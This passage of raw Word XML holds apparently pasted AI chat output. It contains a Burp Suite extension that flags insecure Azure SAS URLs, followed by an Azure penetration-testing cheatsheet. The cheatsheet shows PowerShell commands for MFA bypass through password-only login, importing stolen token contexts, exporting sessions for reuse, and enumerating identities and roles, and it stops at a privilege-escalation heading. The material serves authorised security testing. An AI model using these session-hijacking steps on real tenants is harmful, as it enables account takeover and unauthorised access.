      </w:r>
    </w:p>
    <w:p w14:paraId="79E6D03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body = response[response_info.getBodyOffset():].tostring()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CDD3ED" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4147E2C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matches = re.findall(r'https://[a-z0-9]+\.blob\.core\.windows\.net/[^\s\'"]+\?[^ \'"&lt;&gt;]+sig=[^ \'"&lt;&gt;]+', body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD377D4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A8FF2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for match in matches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251F7E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risk = self.assess_sas_url(match)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0263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if risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E803B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issues.append(SASIssue(baseRequestResponse, match, risk))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E48D75" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291377A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issues if issues else None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE30E33" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A4990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assess_sas_url(self, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8EE3E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risk = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8F5C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if ".vhd" in url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088967E7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risk += " [Disk Export]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A63BA86" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF7639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if "se=" in url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B4B1E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expiry = re.search(r"se=([^&amp;]+)", url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619FC8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if expiry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8B80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expiry_time = datetime.strptime(expiry.group(1), "%Y-%m-%dT%H:%M:%SZ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7E1C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if (expiry_time - datetime.utcnow()).days &gt; 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E040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        risk += " [Long Expiry]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCA3B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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B12E93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risk += " [No Expiry]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78546C61" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CEC12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if "sp=rw" in url or "sp=rwdlacup" in url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5793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    risk += " [Overly Permissive]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77992B91" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A29572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risk.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F026324" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A23758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class SASIssue(IScanIssue):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31E79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__init__(self, baseRequestResponse, url, details):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288E3D4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self._baseRequestResponse = baseRequestResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D2D50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self._url = url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43DC9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self._details = details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18716AF0" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52203EF2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getUrl(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BA7E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self._baseRequestResponse.getHttpService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52040DAC" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008D5C6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getIssueName(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E718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"Insecure Azure SAS URL"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5EB90" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515AB5F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getIssueType(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004EAC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return 0x08000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B09B47" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D41E6B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getSeverity(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C8797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"High"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512AA3E4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDE3B5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getConfidence(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798614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"Firm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9FDB9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E77CDF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getIssueBackground(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE489C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"SAS URLs grant access to Azure blobs. Misconfigured tokens may lead to unauthorized access or data exfiltration."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C245B18" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C77A11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getRemediationBackground(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2A98D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"Use short-lived, permission-scoped SAS tokens with IP/protocol restrictions."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F7C16" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3758271E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getIssueDetail(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE17C8B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"The following insecure SAS URL was found:&lt;br&gt;&lt;b&gt;{}&lt;/b&gt;&lt;br&gt;Flags: {}".format(self._url, self._details)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473C7C0" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C2CFC5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getHttpMessages(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A962D4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[self._baseRequestResponse]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61412393" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFE9FF6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def getHttpService(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B66E0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 xml:space="preserve">        return self._baseRequestResponse.getHttpService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6764B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE4E9B1" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5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📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Packaging Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE63252" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Jython standalone</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> if packaging as a .jar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2559EB" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, create a Burp Suite extension using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Python 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Burp Collaborator / BApp Store (Pro version)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF755F4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA9335A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like a ready-to-run .jar version or more Burp integration tips (e.g., active scan rules or collaborator tricks)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23E8FF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AE6EA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Here's a cleaned-up and rewritten version of the cheatsheet excerpt, tailored specifically for </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenarios, including adversarial context like token reuse and bypassing MFA for post-exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7EBCA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7ADA5FFE">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D662B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Azure Penetration Testing CLI Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C56BE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Adapted from the original by </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Beau Bullock (@dafthack)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AA7A70">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Cloud Pentest Cheatsheets GitHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45C8F5BA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26A1816B">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987A9A0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📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Az PowerShell Module Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74833CC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Ensure the Az module is available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFC6C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Import-Module Az</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3ABA4E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1CEEC050">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A2AA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lastRenderedPageBreak/>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E128310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Standard login (requires interactive/MFA if enforced):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773ABA1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302679D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Alternate login (may bypass MFA under certain misconfigurations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4DC8B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$credential = Get-Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A677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 -Credential $credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0500A058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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used during post-exploitation if password-only login is permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04140E8A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0E5479C2">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E6AF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🎭</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Token and Session Hijacking (Post-Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9A333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Import a stolen/harvested Azure context (e.g., from compromised host):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2456BAD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Import-AzContext -Profile 'C:\Temp\LiveTokens\StolenToken.json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A7F62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Export current authenticated session (for reuse or lateral movement):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B058BB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Save-AzContext -Path 'C:\Temp\AzureAccessToken.json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD153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Useful for maintaining access or transferring session state across attacker tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB49C74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59CFBFE5">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2D91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Would you like me to expand this with enumeration, privilege escalation, or resource abuse commands as well?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE5397" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC9AFC8" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A69630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Great! Here's an expanded </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing CLI Cheatsheet</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, organized by phase: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Resource Abuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — all tailored for offensive security practitioners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808AF14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1201ABC8">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20315A3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Azure Penetration Testing CLI Cheatsheet (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E186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Focus: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Post-Exploitation, Enumeration, Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DA8134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527C73C">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B8FAA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1. Authentication &amp; Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E35C8D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Import Az module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462675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Import-Module Az</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2421F8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Standard login (MFA may apply):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37F00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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEFFB8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Password-only login (bypass MFA if misconfigured):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5403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$cred = Get-Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E2A8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 -Credential $cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D1F94B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Session hijacking – import stolen token/session context:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655BAC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Import-AzContext -Profile 'C:\Loot\StolenToken.json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAC93F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Export current session for reuse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773739C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Save-AzContext -Path 'C:\Loot\TokenBackup.json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB02A23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42132FC0">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4D4606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>2. Azure Resource &amp; Identity Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08842EB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🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>💼</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerate Azure AD Users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200265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Get-AzADUser | Select DisplayName, UserPrincipalName, Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB18D0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👥</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerate Groups and Memberships:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83DB8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Get-AzADGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989762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Get-AzADGroupMember -GroupObjectId &lt;GroupID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698775A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lastRenderedPageBreak/>
        <w:t>☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Subscriptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9C20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Get-AzSubscription | Select Name, Id, State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54E354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📁</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Switch Between Subscriptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1D91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Set-AzContext -SubscriptionId &lt;SubID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813384D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🏷️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerate Resource Groups and Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463CB1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Get-AzResourceGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537351E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 | Select Name, ResourceType, Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1AD4C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List All Role Assignments (Privilege Recon):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4260B9E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Get-AzRoleAssignment | Select DisplayName, RoleDefinitionName, Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C942FE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751BA240">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1BBCDA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🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Privilege Escalation &amp; Misconfig Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6228C1F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🔑</w:t>
      </w:r>
